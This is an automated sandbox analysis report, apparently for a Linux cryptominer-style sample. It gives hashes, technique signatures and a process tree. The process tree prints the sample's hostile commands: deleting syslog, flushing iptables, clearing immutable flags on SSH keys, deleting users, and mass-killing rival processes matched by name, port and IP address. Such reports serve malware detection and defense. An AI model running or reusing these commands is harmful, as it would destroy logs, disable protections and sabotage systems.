Analysis
-
max time kernel
94s -
max time network
124s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
-
submitted
29-09-2024 11:33
General
-
Target
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
-
Size
27KB
-
MD5
fe70c19936ef32efb00f3c75ea90e701
-
SHA1
461514742ae77741e53efb6975ffd8d3db264c92
-
SHA256
7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
-
SHA512
dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
-
SSDEEP
384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 22 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Disables AppArmor 16 IoCs
Disables AppArmor security module.
-
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 2 IoCs
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 8 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes1181⤵
- Writes file to tmp directory
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1suqJW-0000Bu-3X4⤵
- Reads CPU attributes
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1suqJW-0000By-2o4⤵
- Reads CPU attributes
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/usr/sbin/userdeluserdel akay2⤵
-
-
/usr/sbin/userdeluserdel vfinder2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :44442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :135312⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "sleep 60"2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ./crun2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -vw salt-minions2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep systemten2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
-
-
/usr/local/bin/killkill -9 103⤵
-
-
/usr/sbin/killkill -9 103⤵
-
-
/usr/bin/killkill -9 103⤵
-
-
/sbin/killkill -9 103⤵
-
-
/bin/killkill -9 103⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep nMrfmnRa2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep PuNY5tm22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
